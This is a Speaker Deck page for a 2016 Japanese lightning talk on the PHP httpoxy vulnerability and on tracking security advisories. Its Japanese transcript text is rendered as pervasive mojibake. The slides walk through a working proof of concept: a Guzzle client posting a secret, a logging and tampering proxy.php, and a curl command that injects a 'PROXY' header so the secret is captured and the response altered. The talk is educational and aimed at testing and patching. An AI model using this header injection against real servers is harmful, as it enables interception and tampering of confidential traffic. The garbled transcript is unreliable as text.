Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
Search
uzulla
July 20, 2016
Technology
10
6k
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
PHPBLT #5でほぼしゃべらなかったLTの資料です。
uzulla
July 20, 2016
Tweet
Share
More Decks by uzulla
See All by uzulla
似たもの同士のPerlとPHP
uzulla
1
170
More Context, Better Code. 既存コードやOAS等をコンテキストとしてLLMに与える事で、よりよいコード生成を行う話
uzulla
1
130
あなたのアプリ、ログはでてますか?あるいはログをだしてますか? (Funabashi.dev用 軽量版)
uzulla
3
210
セッションのトークセッション / Traps for PHP session features in growing web apps
uzulla
2
150
Crafting a Own PHP - ウキウキ手作りミニマリストPHP
uzulla
5
2.2k
例外を投げるのをやめてみないか? あるいは受け入れてみないか? - How to use exceptions other than throwing
uzulla
4
1k
PHPerが ISUCONでやるべき事
uzulla
1
1.1k
開発生産性は上がらない - N Ways to Reduce Development Productivity
uzulla
1
270
test is not a job
uzulla
1
520
Other Decks in Technology
See All in Technology
コンテナサプライチェーンセキュリティ
kyohmizu
1
130
エンジニアが加速させるプロダクトディスカバリー 〜最速で価値ある機能を見つける方法〜 / product discovery accelerated by engineers
rince
4
540
ディスプレイ広告(Yahoo!広告・LINE広告)におけるバックエンド開発
lycorptech_jp
PRO
0
210
株式会社EventHub・エンジニア採用資料
eventhub
0
4.3k
ソフトウェアエンジニアと仕事するときに知っておいたほうが良いこと / Key points for working with software engineers
pinkumohikan
1
140
わたしがEMとして入社した「最初の100日」の過ごし方 / EMConfJp2025
daiksy
13
3.8k
生成 AI プロダクトを育てる技術 〜データ品質向上による継続的な価値創出の実践〜
icoxfog417
PRO
5
1.9k
OSS構成管理ツールCMDBuildを使ったAWSリソース管理の自動化
satorufunai
0
400
内製化を加速させるlaC活用術
nrinetcom
PRO
2
110
Amazon Aurora のバージョンアップ手法について
smt7174
1
120
人はなぜISUCONに夢中になるのか
kakehashi
PRO
6
1.8k
php-conference-nagoya-2025
fuwasegu
0
140
Featured
See All Featured
VelocityConf: Rendering Performance Case Studies
addyosmani
328
24k
Reflections from 52 weeks, 52 projects
jeffersonlam
348
20k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
40
2k
BBQ
matthewcrist
87
9.5k
Into the Great Unknown - MozCon
thekraken
35
1.6k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
The Cult of Friendly URLs
andyhume
78
6.2k
Building Better People: How to give real-time feedback that sticks.
wjessup
367
19k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
Adopting Sorbet at Scale
ufuk
74
9.2k
Agile that works and the tools we love
rasmusluckow
328
21k
The Art of Programming - Codeland 2020
erikaheidi
53
13k
Transcript
PHPBLT#5 Httpoxyͱ͔ͷ 20160720 uzulla
ࣗݾհ • Junichi Ishida aka uzulla • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢ • HachiojiͳΜͨΒͱ͔
• ͳΜͨΒHacjioji in ͱ͔
Httpoxy • https:/ /httpoxy.org/ • ࡉͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦ͷϦΫΤε τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ • ΞϓϦ͔Βଞͷαʔόʔͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ •
͋Δ͍ɺվ͟ΜͰ͖ΔՄೳੑ • ΈΜͳௐࠪࡁΈͩΑͶʂʁ • ʢΈΜͳ͍ͬͯͨΒϖʔδඈ͢ʣ
None
• ʮCLIͰΑ͋͘Δ༷ʯͱʮCGIͷ༷ʯͷিಥ͕ݪҼ • HTTP_PROXYڥมͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ ͕Α͋͘Δ • ΣϒΞϓϦʹʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣPHPͰ CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ • ͯ͞ɺCGIͷ༷Ͱʢྫ͑ʣHOGEͱ͍͏ϦΫΤετϔομ
ʔΛHTTP_HOGEڥมʹอଘ͢Δͷ͕ͩ…ɻ • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏ڥม͕ ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ
• CGIϦεϖΫτͳPHPmod_phpfastcgi͜ͷ༷ • ͳ͓ɺPHPࣗମ͜ͷ੬ऑੑӨڹ͠ͳ͍ • օେ͖file_get_contentsӨڹͳ͍ • ͕Μͬͯ࡞Γ͜·ͳ͚ΕӨڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ • HTTP_PROXYΛड͚ೖΕΔදతͳϥΠϒϥϦͱͯ͠guzzle
• 6.2.1Ͱमਖ਼ • guzzle࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠ΘΕ͍ͯ ΔɺͳͷͰʹͳͬͨͷͰͨ͠ʂ
ͳ͓… • ઃఆͰ͖ΔͷHTTP_PROXYڥมͰ͋ͬͯɺHTTPS_PROXY ڥมࢦఆͰ͖ͳ͍ • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ • ͭ·ΓɺͬऔΕΔͷHTTP • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
• େͷϠόΠใHTTPSͩΖ͏…ଟ…ɻ
ΦνͱͳΔରࡦ • !ΣϒαʔόͰɺPHPͷࣄલʹϔομʔΛམͱ͢ • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢ • ίʔυΛ͢ • ϥΠϒϥϦͷόʔδϣϯΞοϓ •
❌ʮίʔυઌ಄ͱ͔Ͱڥม্ॻ͖͢Ε͍͍ͷͰʁʯ ʮ೦ͳΒແཧͳͷͰ͢ʯ
͜͜·Ͱօ͞Μ͝ଘ͡ • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ • ʮࣗͰʯௐࠪରԠͯ͠·͔͢ʁ • ʮࣗͰʯීஈ͔Βใऩूͯ͠·͔͢ʁ •
ʢͳ͓ϑϦʔλʔݽಠͳͷͰવηϧϑαʔϏε…ʣ
ࢼͯ͠·͔͢ʁ • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ • ੬ऑੑࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ • ௨ৗࣗͰ࣮͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ ଟ͍ • Proof
of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ • ʢ࠷ۙࢮޠɿexploit codeʣ
ࢼͦ͏ʂ • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ
• PoCͲ͜ʹ͋Δ͔ʁ • CVEʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱͳ͍ɺͷͰ୳͢ • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ͍ΔͷͰ… • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢExploitʣઈରʹ࣮ߦ͢Δͳʂʂʂ • CVEͱ͔ʹͬͯΔౕେৎͩΖ͏͕ɺྑͷExploitഁ
յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ • ࠓճhttpoxy͕ެ։͍ͯͨ͠ • https:/ /github.com/httpoxy/php-fpm-httpoxy-poc
// ݩͷίʔυ͜ͷΑ͏ͳײ͡ // "guzzlehttp/guzzle": "~6.0" $client = new GuzzleHttp\Client(); $client->request(
'POST', 'http://my-internal-microservice.example.com/', ['secret' => 'some-really-secret-string'] ); echo "Request sent\n";
// ͦͷ··Ͱ͑ͳ͍ͷͰɺίʔυमਖ਼ // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ require 'vendor/autoload.php'; $client =
new GuzzleHttp\Client(); $res = $client->request( 'POST', 'http://127.0.0.1:8002/api.php?himi=tsu', ['form_params' => ['secret' => 'I_AM_PHPER']] ); echo $res->getBody();
API(?!)Λ࡞ <?php // api.php echo "BLT!BLT!";
ΞϓϦͱAPI(?!)Λىಈ $ composer install $ php -S 127.0.0.1:8001 index.php #
ผγΣϧͰ $ php -S 127.0.0.1:8002 api.php
ͨΊͯ͠ΈΔ $ curl 'http://localhost:8001/' BLT!BLT! • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK
ѱҙ͋ΔProxyΛ༻ҙ͢Δ • ͝ՈఉʹProxy͕͋Δํෆཁ • Charlesͱ͔ • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙͳʹ͕ϋϠϦͳͷʁ)
ѱҙ()͋ΔࡶͳproxyΛॻ͘ <?php $uri = $_SERVER['REQUEST_URI']; $body = file_get_contents('php://input'); $method =
$_SERVER['REQUEST_METHOD']; error_log($body); error_log(print_r($_SERVER,1)); require 'vendor/autoload.php'; $client = new GuzzleHttp\Client(); $res = $client->request($method, $uri, ['body' => $body]); echo $res->getBody();
ࡶͳProxyʹ͍ͭͯ • ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ • దʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ ʢproxy͔ͩΒͶ…ʣ • ͜ͷίʔυࡶͰةݥͳͷͰ࣮ݧҎ֎ʹઈରʹ͏ͳΑʂ • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ
ࡶͳproxy্ཱͪ͛ $ php -S 127.0.0.1:8003 proxy.php
࣮ࡍʹ੬ऑੑΛςετͩʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
• ʮ೦͜ΕͰ͏͖͝·ͤΜʯ • ͳΜͱbuiltin server ੬ऑੑ͕ͳ͍ʂ͆ • ͱ͍͏͜ͱͰɺ࡞apachehereΛ͔ͭ͏(ͳΜͰ͍͍͚Ͳ) • https:/
/github.com/uzulla/apachehere $ apachehere -p 8001 DocumentRoot : /xxx php-cgi open : http://127.0.0.1:8001/ <snip> [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php
ϦτϥΠʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
ޭ͢Δͱproxyͷϩάʹ… [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20
02:01:43 2016] Array ( [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc [REMOTE_ADDR] => 127.0.0.1 [REMOTE_PORT] => 53696 [SERVER_SOFTWARE] => PHP 7.0.3 Development Server [SERVER_PROTOCOL] => HTTP/1.1 [SERVER_NAME] => 127.0.0.1 [SERVER_PORT] => 8003 [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu [REQUEST_METHOD] => POST [SCRIPT_NAME] => /api.php [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php [PHP_SELF] => /api.php [QUERY_STRING] => himi=tsu [HTTP_HOST] => 127.0.0.1:8002 [HTTP_PROXY_CONNECTION] => Keep-Alive [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3 [CONTENT_TYPE] => application/x-www-form-urlencoded [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded [CONTENT_LENGTH] => 17 [HTTP_CONTENT_LENGTH] => 17 [REQUEST_TIME_FLOAT] => 1468947703.6871 [REQUEST_TIME] => 1468947703 )
[Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43
2016] Array ( snip [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ
proxyΛमਖ਼͢Ε… // proxy.php //echo $res->getBody(); echo "ീԦࢠʂീԦࢠʂ"; • ͱमਖ਼ͯ͠ $
curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' ീԦࢠʂീԦࢠʂ • վ͟ΜޭͰ͢Ͷʂ
ͱ͍͏͜ͱͰɺ • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷॏཁɺษڧʹͳΔ • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ
͋ͱɺ৻ॏʹͶʂ • ύονόʔδϣϯΛ͘Έ͍͚ͯͳ͍ • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮ʯ exception: php_sapi_name() has been disabled
for security reasons. It can be re-enabled by adding it to the google_app_engine.enable_functions ini variable in your applications php.ini • ʮGAE ͕ѱ͍ ͷ༷Ͱʁʯʮ͔ͨ͠ʹʯ
ͰυίͰΔ͔ʁ • օ͞ΜͲ͜Ͱͬͯ·͔͢ʁ
ΛΥον͠ଓ͚Δ • ໘͕ͩࣄͩʂ • TwitterͳͲSNSͰΔ • CVEͳͲΛߪಡ͢Δ • χϡʔεαΠτΛߪಡ͢Δ •
ެࣜϦϦʔεΛߪಡ͢Δ
TwitterͳͲSNS • ใੑ͕ߴ͍ɺ5ׂ͘Β͍͜͜ͰଘࡏΛΔࣄʹͳΔ • ʢPHPͷਓͰͳ͆͘ʣJSɺGoɺPerlΠϯϑϥํ໘ͳͲͷਓΛ ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ • ৄ͍͠ਓવʹ͢Δ͜ͱ͕ଟ͍͠ɺ ʢΘ͔͍ͬͯΔͷͰʣҰ࣍ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍
ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ • http:/ /jvn.jp/report/ • JVNɺຊޠɺ·͚ͣͩ͜͜Ͱྑ͍ʢͱࢥ͏ʣ • Feed͋ΔΑ • https:/
/www.jpcert.or.jp/ • JPCERTɺϝϧϚΨ͋ΔΑʂ
• https:/ /nvd.nist.gov/download.cfm • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར • CVE΄΅Ұ࣍ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ • https:/ /security.sensiolabs.org/database
• PHPϥΠϒϥϦͷใɺFeed͕͋ΔͷͰศར
ҰൠతͳχϡʔεαΠτ • ҰൠతͳITܥχϡʔεαΠτ…ຊจಡ·ͣʹ͙͢ʹϦϯΫઌ ͷҰ࣍ใݴͬͨํ͕ྑ͍…ɻ
• reddit֤छɺใੑߴ͍͕ίϝϯτ͙͢ʹ৴༻͠ͳ͍Α͏ʹ • https:/ /www.reddit.com/r/netsec • https:/ /www.reddit.com/r/sysadmin • https:/
/www.reddit.com/r/PHP • hackernewsɺ͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘ • https:/ /news.ycombinator.com/news
ެࣜαΠτ • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ • ͕͔͍ࣗͭͬͯΔϑϨʔϜϫʔΫϥΠϒϥϦPHPͷϦϦ ʔεͱ͔Έͯྑ͍ͷͰʁʁ
blog • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔ • ηΩϡϦςΟاۀͷϒϩάΑ͍ • વ͚ͩͲɺཏੑ͕ͳ͍ • ʮ୯ޠʯΛͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰΑ͍ •
झຯ͕ͰΔͷͰলུ
Branded Vulnerability ͳαΠτ • ࠷ۙΩϟονʔͳ໊લ͕͘ɺHttpoxyͦ͏ • GHOST,FREAK,POODLEʑ • ·ͱΊαΠτΈ͍ͨͳͷɺγΣΞ͘͢͠ΩϟονʔͳΞΠ ίϯ͕͋ͬͨΓͯ͠Α͍
• ଟ͘ͷ߹CVEΑΓΘ͔Γ͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ ͰOK͕ͩɺӳޠͰ͢ɻ • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱͳ͍ɺٯ·͔ͨ͠Γ
ใΩϟον·ͱΊ • ΥονʹRSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱͳ͍͆ʣ • JPCERTͱJVN͘Β͍ొͯ͠Α͍ͷͰ • Branded VulnerabilityͳαΠτ͕͋Ε·ͣνΣοΫ •
ӳޠ͕ॏཁʢʣ • ༁ղઆهࣄҰ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚ Ε߄ͯͣʹਖ਼࠲ͯͭ͜͠ͱ
That's all folks! • ੬ऑੑࣗͰͨΊͦ͏ʂ • χϡʔεΛͪΌΜͱݟΑ͏ʂ • ͪΌΜͱ੬ऑੑΛѲͯ͜͠ʂ •
Httpoxyɺ͋Μ·Γखͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ // enjoy ! $ grep -r HTTP_PROXY /your/codes/